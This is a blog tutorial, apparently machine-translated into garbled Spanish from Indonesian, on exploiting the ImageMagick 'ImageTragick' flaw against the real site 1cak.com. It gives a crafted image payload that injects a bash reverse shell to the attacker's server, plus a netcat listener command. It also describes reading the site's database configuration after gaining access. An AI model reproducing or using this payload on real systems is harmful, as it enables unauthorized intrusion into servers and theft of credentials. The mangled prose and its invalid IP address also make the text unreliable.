Hmm .. explotar este hecho ya en auge hace unos tigabulan. Sin embargo, algunos de ayer día otra vez llena cuando la gente comparte noticias sobre peces de colores Herdian Nugraha que reciben 25 millones de ruplah Tokopedia y bukalapak para encontrar este error en su sitio. Tenía curiosidad y después de que ayer hubo 1CAK pavimentada, he tratado de explotar el sitio 1CAK.com tuvo éxito (ahora el error ya está también en el parche). Entonces, ¿cómo exactamente los pasos de este explotan?
ImageMagick en sí es un software de gráficos de forma gratuita. Capacidad, entre otros, fueron capaces de crear, modificar y visualizar las imágenes de mapa de bits, además de ser capaz de leer, escribir y realizar las conversiones en una variedad de diferentes formatos de imagen.
Está bien simplemente al paso de zancada. Aquí espero que ya ha creado para VPS o podría ser una dirección IP estática, porque vamos a utilizar para obtener un shell inversa.
Ahora vamos a crear un archivo con el siguiente contenido:
push graphic-context
viewbox 0 0 840 780
fill 'url(https://127.0.0.0/oops.jpg"; bash -i >& /dev/tcp/198.23.121.1337/6969 0>&1)'
pop graphic-context
Debido 1cak sólo permiten archivos de tipo jpg y png, a continuación, guardar el archivo con formato jpg / png. Ajuste también la PI y su puerto de escucha.
Por otra parte, desde VPS entramos en el siguiente comando:
nc -lvp 6969
A continuación, cargar el archivo de carga útil que hemos creado antes. En este caso, he intentado subir a través de la función de carga en 1cak meme.
Me sale el siguiente error:
Pero, al mismo tiempo que hemos mendpatkan acceso a una consola interactiva en nuestros VPS.
Estoy intentando leer un archivo de configuración en la base de datos de directorio y registrar inc. También puede ser.
Bueno hasta aquí el tutorial si diterusin incluso ser enseñado que Engga Engga.
Bueno por lo que este tutorial, puede ser útil.
Publicar un comentario